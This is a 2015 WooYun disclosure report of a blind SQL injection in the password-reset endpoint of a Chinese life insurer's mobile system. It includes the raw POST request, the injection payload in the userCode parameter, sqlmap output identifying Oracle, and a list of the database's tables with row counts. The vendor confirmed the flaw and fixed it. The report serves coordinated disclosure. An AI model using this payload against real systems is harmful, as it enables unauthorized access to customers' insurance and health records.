当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158847

漏洞标题:吉祥人寿某系统Oracle注入漏洞

相关厂商:吉祥人寿保险股份有限公司

漏洞作者: 无名人

提交时间:2015-12-06 17:12

修复时间:2016-01-19 09:45

公开时间:2016-01-19 09:45

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-06: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经确认,细节仅向厂商公开
2015-12-17: 细节向核心白帽子及相关领域专家公开
2015-12-27: 细节向普通白帽子公开
2016-01-06: 细节向实习白帽子公开
2016-01-19: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

RT

详细说明:

漏洞系统:http://mobile.jxlife.com.cn/
漏洞地址:

POST /servlet/process.action HTTP/1.1
Host: mobile.jxlife.com.cn
Proxy-Connection: keep-alive
Content-Length: 123
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.5.0
Origin: http://mobile.jxlife.com.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://mobile.jxlife.com.cn/sys/getUserPsw.jsp?type=forgetPsw
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=00009c2jYA5WXYrGQqaeWo_fOuO:-1
beanId=UserPswAction&operation=reSetPsw&userCode=admin*&type=forgetPsw&userName=%E6%A8%A1%E5%8E%8B&IDNo=&mobileNo=&eMail=&_=


userCode参数存在布尔注入

---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: beanId=UserPswAction&operation=reSetPsw&userCode=admin') AND 2131=2
131 AND ('xgpO'='xgpO&type=forgetPsw&userName=%E4%BA%8B%E4%B8%8E%E6%84%BF%E8%BF%
9D&IDNo=&mobileNo=&eMail=&_=
---
[12:29:17] [INFO] testing MySQL
[12:29:17] [WARNING] the back-end DBMS is not MySQL
[12:29:17] [INFO] testing Oracle
[12:29:17] [INFO] confirming Oracle
[12:29:17] [INFO] the back-end DBMS is Oracle
web application technology: Apache
back-end DBMS: Oracle

漏洞证明:

数据库:

数据库.png


数据量不少:

Database: YDZY
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| FORMLSHEALTH | 2341224 |
| OPERATORHISTORY | 570949 |
| LSPOL | 242818 |
| LDSYSREQUESTLOG | 219201 |
| LDSYSLOG | 200223 |
| LDSYSIMAGES | 185005 |
| LSCONT | 160176 |
| LSSUGGESTPUBELEMENT | 157769 |
| SUGTOEFORM | 157193 |
| LSLATNCYCUSTMTRANS | 143403 |
| LSSUGGESTPRIELEMENT | 128451 |
| FORMLSPICINFO | 125319 |
| LSAPPNT | 123111 |
| LSINSURED | 121650 |
| CV_1303 | 114264 |
| CV_112201 | 85864 |
| DIV_112201 | 85864 |
| DIV_212204 | 85864 |
| LSREMIND | 80497 |
| FORMLSPOL | 74332 |
| LSLATNCYCUSTM | 58144 |
| CV_5003 | 52594 |
| DIV_5003 | 51960 |
| FNAPDFHIS | 46894 |
| CV_111201 | 42276 |
| DIV_111201 | 42276 |
| SAVAINSUANDAPPFLAG | 39024 |
| LSUSERDEVICE | 38592 |
| CV_111203 | 37216 |
| DIV_111203 | 37216 |
| CV_113201 | 35448 |
| CV_128101 | 35448 |
| DIV_113201 | 35448 |
| CV_118102 | 33378 |
| CV_218101 | 33378 |
| LSMESSAGEHISTORY | 33323 |
| FORMLSCONT | 32430 |
| FORMLSREPAY | 32430 |
| FORMLSAPPNT | 32429 |
| FORMLSINSURED | 32428 |
| FORMSTATE | 31894 |
| CV_124101 | 28444 |
| CV_128103 | 28444 |
| CV_124103 | 26790 |
| CV_128105 | 26790 |
| CV_212205 | 26670 |
| CV_228101 | 26670 |
| DIV_212205 | 26670 |
| FORMLSPAYINFO | 25545 |
| LAQUALIFICATION | 20276 |
| CV_211101 | 17914 |
| CV_212204 | 17054 |
| LSUSER | 13818 |
| CV_211102 | 11920 |
| LSUSERPSWHISTORY | 10723 |
| CV_111202 | 10200 |
| CV_611201 | 10200 |
| DIV_111202 | 10200 |
| DIV_611201 | 10200 |
| LDCODE | 7891 |
| CV_112202 | 7360 |
| CV_128102 | 7360 |
| DIV_112202 | 7360 |
| LSACTIVITYWARNINGRECORD | 7282 |
| LDMAXNO | 7182 |
| CV_129102 | 6600 |
| CV_129104 | 6600 |
| CV_629101 | 6600 |
| LSCANDIDATEINFO | 6260 |
| HOSPITALPOSITION | 6010 |
| LSCOM | 5984 |
| LSUSERTRANS | 5871 |
| USERCODETRANS | 5227 |
| INVESTRISKDATA | 4866 |
| FORMLSBENEFI | 4597 |
| CV_212203 | 3770 |
| DIV_212203 | 3770 |
| CV_124102 | 3588 |
| CV_112203 | 2710 |
| CV_128104 | 2710 |
| DIV_112203 | 2710 |
| LSRENEWALVISIT | 2524 |
| LSRENEWALVISITPOL | 2524 |
| FNAANSWER | 2222 |
| CV_2007 | 2160 |
| LDOCCUPATION | 2011 |
| CV_2002 | 1488 |
| LSUSERTEAM | 1256 |
| RATE_212205 | 1144 |
| RATE_228101 | 1144 |
| FORMLSPRTID | 1095 |
| RATE_112201 | 1082 |
| CALCUTEELEMET | 1017 |
| T_CUSTOMER | 1000 |
| PROCEEDSEXPRESS | 966 |
| RATE_124103 | 948 |
| RATE_128105 | 948 |
| CV_1104 | 912 |
| RATE_2005 | 746 |
| RATE_EFG | 746 |
| RATE_1303 | 714 |
| FORMLSREPAYMAIN | 696 |
| FORMLSHEALTHEXP | 672 |
| LSACTIVITY | 647 |
| RATE_5003 | 634 |
| DIV_2007 | 560 |
| LSLATNCYCUSTMFAMILY | 559 |
| RATE_211102 | 534 |
| GP_111201 | 532 |
| RATE_111201 | 532 |
| RATE_124101 | 532 |
| RATE_128103 | 532 |
| RATE_111203 | 492 |
| RATE_113201 | 458 |
| RATE_128101 | 458 |
| LSITEMDATALINK | 422 |
| LSDATAITEM | 421 |
| RATE_118102 | 418 |
| RATE_218101 | 418 |
| RATE_111202 | 408 |
| RATE_118201 | 408 |
| RATE_611201 | 408 |
| COMMISSIONPLUSSEQUESTRATE | 396 |
| FNAFIMAILYRELATIONS | 380 |
| RATE_124102 | 380 |
| COMMISSIONDETAIL | 352 |
| RATE_211101 | 348 |
| LMCALMODE | 332 |
| RATE_129102 | 264 |
| RATE_129104 | 264 |
| RATE_629101 | 264 |
| RATE_212203 | 258 |
| FNACUSTOMDATA | 244 |
| RISKPLANANDRISKSALECONF | 236 |
| LMCHECKFIELD | 234 |
| LSRPTRANSRECORD | 229 |
| LSRENEWALPAY | 217 |
| RATE_212204 | 214 |
| RISKRATE_122301 | 212 |
| RISKRATE_123301 | 212 |
| RISKRATE_222302 | 212 |
| LDSYSVAR | 195 |
| LSMODELLINK | 187 |
| FEETENCENT | 183 |
| LMRISKSCREEN | 179 |
| CV_1106 | 178 |
| DIV_1106 | 178 |
| LDCOMGRPTOCOM | 172 |
| POLDETAILCARE | 158 |
| FNAZ | 152 |
| STATICMSGURL | 142 |
| LMRISKPARAM | 135 |
| LSCLAIMINFO | 129 |
| RATE_112202 | 128 |
| RATE_128102 | 128 |
| UPLOADPICFILE | 125 |
| RATE_112203 | 118 |
| RATE_128104 | 118 |
| FNASINGLE | 116 |
| RATE_2007 | 114 |
| FNAINSURANCEDATA | 113 |
| AVLSP_PL | 106 |
| LDSYSIMAGECHEKDETAIL | 99 |
| FNAFEEDATA | 98 |
| LMRISKROLE | 98 |
| FORMLSHEALTHSUBJECT | 96 |
| YIBEIFEIYONG | 95 |
| RATE_2002 | 92 |
| FNAINCOMEDATA | 89 |
| GERENBAOXIAOSHOUXIAN | 88 |
| POLDETAILFIRSTYEAR | 88 |
| YINGBEITABLE | 88 |
| RISKPLAN | 85 |
| LSGOLDPSW | 84 |
| REMINDREAD | 84 |
| LSAGENTMENUGRPTOMENU | 83 |
| LSTAXES | 78 |
| LSLATNCYCUSTMINTRODUCE | 77 |
| LMRISKSCREENVALIDATE | 74 |
| POLDETAILCONTINUE | 74 |
| QITASHOURU | 73 |
| RATE_1104 | 72 |
| QITAFEIYONG | 71 |
| FNACHILDREN | 70 |
| LSAGENTMENU | 70 |
| TB_222301 | 62 |
| TB_222302 | 62 |
| FNAINVESTARGDATA | 60 |
| LSCOMTRANS | 56 |
| LSCOMPARAM | 55 |
| LSLATNCYCUSTMIMPDATE | 55 |
| FNAINVESTDATA | 54 |
| FORMLSHEALTHVERCOD | 51 |
| ZICHAN | 51 |
| LMDUTY | 50 |
| LMDUTYGET | 49 |
| LMDUTYGETRELA | 49 |
| LMDUTYPAY | 49 |
| LMDUTYPAYRELA | 49 |
| LMRISKDUTY | 49 |
| FNAMANY | 48 |
| ZHANRISK | 47 |
| LMRISK | 45 |
| DEVELOPMENTACTIVITY | 44 |
| KHZL | 44 |
| LMRISKRELA | 43 |
| LSPLANCODE | 42 |
| LMRISKAPP | 40 |
| LMRISKCOMCTRL | 40 |
| FNALOANDATA | 39 |
| QITADAIKUAN | 38 |
| LSRISKITEM | 37 |
| PACKAGEMANAGE | 36 |
| LSITEM | 35 |
| JIAOYUFEIYONG | 34 |
| LSPAYPERMONTH | 34 |
| FNAPARA | 31 |
| FNAMAIN | 30 |
| TB_122301 | 30 |
| FNASYSPARAM | 29 |
| FNAOTHTAGPAYDATA | 26 |
| LDSYSIMAGECHECK | 26 |
| LSSEQUENCEACTIVITY | 26 |
| LSAPPEDPOL | 24 |
| FNARETPAYDATA | 22 |
| JIAOYUFEIYONGFJ | 22 |
| LSCOMSTATUSTRACE | 21 |
| RATE_1106 | 18 |
| LSAGENTMENUGRP | 14 |
| LSUSERUNREALGROUPMEMBER | 14 |
| AUTHORIZDBANKINFO | 12 |
| LSHEALTHINFORM | 12 |
| LSSECONDOPRATOR | 12 |
| LSUSERPARAMS | 12 |
| LSWORDMSG | 12 |
| LSUSERUNREALGROUP | 10 |
| TB_212302 | 10 |
| XIALACAIDAN | 9 |
| LSKNOWLEDGEBASEITEM | 8 |
| LSNOTICE | 7 |
| LDCOMGRP | 6 |
| RATE_128204 | 6 |
| RATE_128205 | 6 |
| RATE_129101 | 6 |
| LMRISKSALEGROUPTORISK | 5 |
| LSACTIVITYDONEHISTORY | 4 |
| NOTICE | 4 |
| LSBENIFIT | 3 |
| POLSHORTCONTINUE | 3 |
| LMRISKSALEGROUP | 2 |
| LSMODEL | 2 |
| LSPRTANDEFORMNO | 2 |
| LSPHOTO | 1 |
| PUSHHISTORY | 1 |
+---------------------------+---------+


看你们以前的洞rank都不高,注入求个10rank可好?

修复方案:

@@

版权声明:转载请注明来源 无名人@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-12-07 14:43

厂商回复:

属于内部业务系统,谢谢关注!
我们将核实修复。

最新状态:

2016-01-18:已修复

2016-01-19:漏洞已修复